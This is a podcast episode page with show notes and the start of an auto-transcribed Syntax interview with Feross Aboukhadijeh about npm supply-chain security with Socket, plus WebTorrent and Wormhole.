705: Is Running Random Code From npm Safe? With Feross Aboukhadijeh

Syntax - Tasty Web Development Treats

Wes Bos

Tech News, Technology, News

4.9 • 1.2K Ratings

🗓️ 15 December 2023

⏱️ 67 minutes

🔗️ Recording | iTunes | RSS

🧾️ Download transcript

Summary

In this Supper Club episode of Syntax, Wes and Scott talk with Feross Aboukhadijeh about his work on Socket which helps to make sure the code you get from npm is safe and secure. They also touch on his work on Wormhole and Web Torrent. Show Notes 00:30 Welcome 00:57 Who is Feross Aboukhadijeh? 01:33 What is Socket? [Socket.dev](https://socket.dev dominictarr (Dominic Tarr) pull-stream/pull-stream: minimal streams 03:59 Introducing AI package summaries Example of the AI summaries Introducing AI Package Summaries 07:04 Is Socket’s focus on visibility of a open source project? 10:01 What was the inspiration for Socket? Introducing “safe npm”, a Socket npm Wrapper - Socket 16:22 How does Socket detect possible security issues? Removed packages event-source-polyfill protestware attack john wick spam attack 18:55 How many projects are you injesting for Socket to scan? 26:00 What kinds of things are people trying to inject in code? CS253 Web Security 29:54 How do I hook Socket up to my project or GitHub? 32:08 Do we still need to use shrink wrap? 36:34 How did you implement the torrent spec in JavaScript for WebTorrent? WebTorrent Desktop WebTorrent FAQ 43:11 Why did you build Wormhole? Wormhole 47:33 How expensive is it to maintain Wormhole? Riverside.fm - Record Podcasts And Videos From Anywhere 50:37 What do you think of decentralized code repos? Radicle Project Fugu Fugu Tracker 54:29 Understanding passkeys 56:15 Supper Club questions GitHub Theme - Visual Studio Marketplace Web Serial API - Web APIs | MDN 01:03:04 Sick Picks Sick Picks Harry Potter audio books Shameless Plugs ChatGPT Hit us up on Socials! Syntax: X Instagram Tiktok LinkedIn Threads Wes: X Instagram Tiktok LinkedIn Threads Scott: X Instagram Tiktok LinkedIn Threads

Transcript

Click on a timestamp to play from that location

0:00.0	I sure hope you're hungry.
0:02.0	Who I'm starving?
0:04.0	Wash those hands, pull up a chair and secure that feed bag.
0:08.0	Because it's time to listen to Scott Tolinsky and West Boss attempt to use human language to converse with and picked the brains of other developers.
0:16.8	I thought there was going to be food.
0:18.8	So buckle up and grab that old shit handle because this ride is going to get wild.
0:25.0	This is the Syntax Supper Club.
0:30.0	Welcome to St. Tew's and tax. Today we're talking about should you just
0:37.6	NPM install random code? Can you trust all of the random code that is
0:41.9	47 dependencies deep on NPM.
0:45.0	We've got for us on from socket.dev as well as like
0:50.0	I will wait till a little later on to talk about it but I do want to talk about web torrent and
0:55.3	and wormhole as well because I think that is super cool but welcome frost
0:59.7	thanks for coming on yeah you got it got it. Thanks for having me.
1:03.0	It's super cool to be here.
1:04.0	Excited to talk with you guys.
1:06.0	Yeah, so we recommended to you from Darcy.
1:10.0	I've met you before on other things that you were working on but it seems like you've been
1:15.1	working on socket.dev for I don't know what about a year now or so or is it longer than that?
1:21.3	Actually going on a little a little yeah, more like two years.
1:25.0	Yeah, it's been a little while.
1:26.0	Yeah, well, I guess we launched it about a year and a half ago, so that's probably what you're thinking,
	...

Please login to see the full transcript.

Previous episode | Next episode

Disclaimer: The podcast and artwork embedded on this page are from Wes Bos, and are the property of its owner and not affiliated with or endorsed by Tapesearch.

Generated transcripts are the property of Wes Bos and are distributed freely under the Fair Use doctrine. Transcripts generated by Tapesearch are not guaranteed to be accurate.